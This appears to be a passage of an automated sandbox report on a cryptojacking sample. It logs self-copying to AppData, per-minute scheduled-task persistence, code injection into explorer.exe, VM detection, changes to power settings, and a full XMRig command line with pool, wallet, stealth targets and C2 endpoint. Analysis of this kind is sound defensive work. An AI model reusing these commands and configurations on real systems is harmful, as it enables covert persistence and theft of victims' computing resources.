              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Windows\explorer.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: explorer.exe, 00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4801808070.000000000320E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
              Source: explorer.exe, 00000011.00000002.4801808070.00000000031D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXELLL
              Source: explorer.exe, 00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEXE
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --ALGO=RX/0 --URL=XMR-EU1.NANOPOOL.ORG:10300 --USER="49PXA5CU5H8JNB4X6ADM7VGFK4E8Z11JB9AJXCFBC69WRZXFPJGNJFKFZLTKM5W33FK3Y1ZYVJFJCEDEL5PDUNZP1EPMXHX" --PASS="" --CPU-MAX-THREADS-HINT=20 --CINIT-WINRING="HAACZRNYAVRJ.SYS" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTP://CF-PROTECTED-L7.COM/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.0" --CINIT-IDLE-WAIT=1 --CINIT-IDLEXPLORER.EXE
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEHA
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
              Source: explorer.exe, 00000011.00000003.2347665199.0000000001421000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXEHTTP://CF-PROTECTED-L7.COM/API/ENDPOINT.PHPTMSNNPRPBVNFZOKR
              Source: explorer.exe, 00000011.00000003.4155726995.00000000031E0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155583902.00000000014A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "STEALTH-TARGETS": "TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE",
              Source: explorer.exe, 00000011.00000002.4801808070.000000000320E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXEITY\SYSTEM;V
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --ALGO=RX/0 --URL=XMR-EU1.NANOPOOL.ORG:10300 --USER="49PXA5CU5H8JNB4X6ADM7VGFK4E8Z11JB9AJXCFBC69WRZXFPJGNJFKFZLTKM5W33FK3Y1ZYVJFJCEDEL5PDUNZP1EPMXHX" --PASS="" --CPU-MAX-THREADS-HINT=20 --CINIT-WINRING="HAACZRNYAVRJ.SYS" --CINIT-STEALTH-TARGETS="TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE" --CINIT-STEALTH-FULLSCREEN --CINIT-API="HTTP://CF-PROTECTED-L7.COM/API/ENDPOINT.PHP" --CINIT-VERSION="3.4.0" --CINIT-IDLE-WAIT=1 --CINIT-IDLEXPLORER.EXE--ALGO=RX/0--URL=XMR-EU1.NANOPOOL.ORG:10300--USER=49PXA5CU5H8JNB4X6ADM7VGFK4E8Z11JB9AJXCFBC69WRZXFPJGNJFKFZLTKM5W33FK3Y1ZYVJFJCEDEL5PDUNZP1EPMXHX--PASS=--CPU-MAX-THREADS-HINT=20--CINIT-WINRING=HAACZRNYAVRJ.SYS--CINIT-STEALTH-TARGETS=TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE--CINIT-STEALTH-FULLSCREEN--CINIT-API=HTTP://CF-PROTECTED-L7.COM/API/ENDPOINT.PHP--CINIT-VERSION=3.4.0--CINIT-IDLE-WAIT=1--CINIT-IDLE-CPU=80--CINIT-ID=TMSNNPRPBVNFZOKRV
              Source: explorer.exe, 00000011.00000003.2347665199.0000000001421000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4800541815.0000000001407000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4801808070.00000000031D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.3273815403.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155583902.00000000014A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeMemory allocated: F30000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeMemory allocated: 1AE00000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeMemory allocated: 2970000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeMemory allocated: 1AA70000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeMemory allocated: 3160000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeMemory allocated: 1B1D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeMemory allocated: 11B0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeMemory allocated: 1AC30000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeMemory allocated: 16C0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeMemory allocated: 1B1A0000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\haaczrnyavrj.sysJump to dropped file
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exe TID: 7088Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\explorer.exe TID: 6756Thread sleep count: 98 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe TID: 5992Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe TID: 6752Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe TID: 2900Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe TID: 7056Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\powercfg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\powercfg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
              Source: C:\Windows\System32\powercfg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\System32\powercfg.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4800541815.00000000013E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\explorer.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Injects code into the Windows Explorer (explorer.exe)
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeMemory written: PID: 4112 base: 140000000 value: 4DJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeMemory written: PID: 4112 base: 140001000 value: NUJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeMemory written: PID: 4112 base: 140674000 value: DFJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeMemory written: PID: 4112 base: 140847000 value: 00Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeMemory written: PID: 4112 base: 1146010 value: 00Jump to behavior
              Modifies the context of a thread in another process (thread injection)
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeThread register set: target process: 4112Jump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe" Jump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgdJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /fJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\Desktop\ft1i6jvAdD.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /fJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgdJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /fJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe" Jump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgdJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /fJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeProcess created: unknown unknown
              Source: explorer.exe, 00000011.00000003.4155128655.000000000321E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155775773.0000000003223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"tmsnnprpbvnfzokr","computername":"468325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":180,"type":"xmrig","pool":"xmr-eu1.nanopool.org","port":10300,"algo":"rx/0","worker":"","password":"","user":"49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx","hashrate":553.1276263657102,"status":3}bus\
              Source: explorer.exe, 00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.3273815403.00000000014A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: explorer.exe, 00000011.00000003.4155128655.000000000321E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155775773.0000000003223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"tmsnnprpbvnfzokr","computername":"468325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":180,"type":"xmrig","pool":"xmr-eu1.nanopool.org","port":10300,"algo":"rx/0","worker":"","password":"","user":"49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx","hashrate":553.1276263657102,"status":3}
              Source: explorer.exe, 00000011.00000003.4155726995.00000000031E0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4801808070.00000000031D7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155583902.00000000014A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\explorer.exe - Program Manager
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 68325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":2,"type":"xmrig","pool":"xmr-eu1.nanopool.org","port":10300,"algo":"rx/0","worker":"","password":"","user":"49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx","hashrate":0.0,"status":6}
              Source: explorer.exe, 00000011.00000003.4155128655.000000000321E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155775773.0000000003223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"tmsnnprpbvnfzokr","computername":"468325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":180,"type":"xmrig","pool":"xmr-eu1.nanopool.org","port":10300,"algo":"rx/0","worker":"","password":"","user":"49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx","hashrate":553.1276263657102,"status":3}}
              Source: explorer.exe, 00000011.00000003.4155726995.00000000031E0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.4801808070.00000000031D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzC:\Windows\explorer.exe - Program Managerxmr-eu1.nanopool.org49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx
              Source: explorer.exe, 00000011.00000002.4800541815.00000000014A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager`
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"tmsnnprpbvnfzokr","computername":"468325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":2,"type":"xmrig","pool":"xmr-eu1.nanopool.org","port":10300,"algo":"rx/0","worker":"","password":"","user":"49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx","hashrate":0.0,"status":6}
              Source: explorer.exe, 00000011.00000003.4155128655.000000000321E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000003.4155775773.0000000003223000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"tmsnnprpbvnfzokr","computername":"468325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":180,"type":"xmrig","pool":"xmr-eu1.nanopool.org","port":10300,"algo":"rx/0","worker":"","password":"","user":"49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx","hashrate":553.1276263657102,"status":3}stem[
              Source: explorer.exe, 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 68325","username":"user","gpu":"BF2DF","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"","version":"3.4.0","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":2,"type":"xmrig","pool":"xmr-eu1.nanopool.org","port":10300,"algo":"rx/0","worker":"","password":"","user":"49pXA5CU5H8jNb4x6ADM7vGFk4e8z11jB9AjxcFBc69wRZXfPjgnjFkFzLTkm5w33FK3Y1zYvJFJcedEL5PdUnZP1Epmxhx","hashrate":0.0,"status":6},q
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeQueries volume information: C:\Users\user\Desktop\ft1i6jvAdD.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeQueries volume information: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeQueries volume information: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeQueries volume information: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeQueries volume information: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe VolumeInformation
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Lowering of HIPS / PFW / Operating System Security Settings

              barindex
              Modifies power options to not sleep / hibernate
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
